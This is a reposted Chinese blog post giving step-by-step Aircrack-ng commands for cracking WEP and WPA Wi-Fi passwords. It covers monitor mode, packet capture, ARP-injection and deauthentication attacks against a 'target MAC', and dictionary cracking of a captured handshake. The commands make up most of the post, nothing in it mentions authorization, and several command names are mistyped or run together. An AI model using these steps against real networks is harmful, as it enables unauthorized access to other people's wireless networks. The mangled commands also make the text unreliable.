Aircrack-ng 个人感觉算是一款超好用的wifi破解工具了,尤其是前几年,那个时候的路由器只有wep和wpa ,对于这两种的,破解效率应该是很高,只是不知道对于wpa2的破解效率如何,按照原理来讲,应该是很难在短时间破解,我对破解兴趣不高,不过还是该记下来,最近刚好在网上看到一个好的教程,我就摘一些精华部分做个笔记。
以下是wep破解过程:
Ifconfigwlan0 up 挂载无线网卡
Airmon-ngstart wlan0 激活无线网卡为监听模式
Airodump-ngmon0抓包
Airodump-ng –ivs –w shujubao –c 6 wlan0 抓包并保存
--ivs 这里是设置过滤,只保存用于破解的ivs文件,可以不加这个参数的,信道是多少写多少,一般是6,这个可以在抓包的时候看到,这一步可能会抓到好几个路由器的报文,选择自己要的就是了。
Airplay-ng -3 –b 目标MAC –h 客户端MAC mon0
-3是指采用arprequesr注入攻击模式(后面会提到参数0)
等待一段时间,具体等多少,就是等1000个以上的数据包吧,保险可以多等一会
Aircrack-ng shujubao-01.ivs 进行破解了,这种模式好破,当然拿windows下面破利用GPU加速更快。
Wpa加密破解:
前面都一样抓包的时候使用如下命令:
Airodump-ng -c 6 –w shujubao mon0
Aireplay-ng -0 10 –a 目标MAC –c 客户端MAC wlan0(参数与WEP有很大不同)
-0采用deauth攻击模式,后面是攻击次数,一般1次有效就好了。
屏幕上出现了:WPA handshake说明抓到了握手包
Aircrack-ng –w dic shujubao-01.cap
这里面需要自己制作字典,建议在win下面破解,字典工具也多,自己做一个就好了。也可以扔到网站上破解,他们应该有超大的彩虹表吧,个人感觉对于复杂的wpa2密码,这种攻击方式不是很好用,运气不好,要破几个月也是有可能,当然我没有验证,懒。不过这种方法确实是万能的,限制条件不多。
本文出自 “如风般的自由” 博客,请务必保留此出处http://capricorn.blog.51cto.com/8304701/1392338
wifi破解之aircrack工具使用方法整理,布布扣,bubuko.com
原文:http://capricorn.blog.51cto.com/8304701/1392338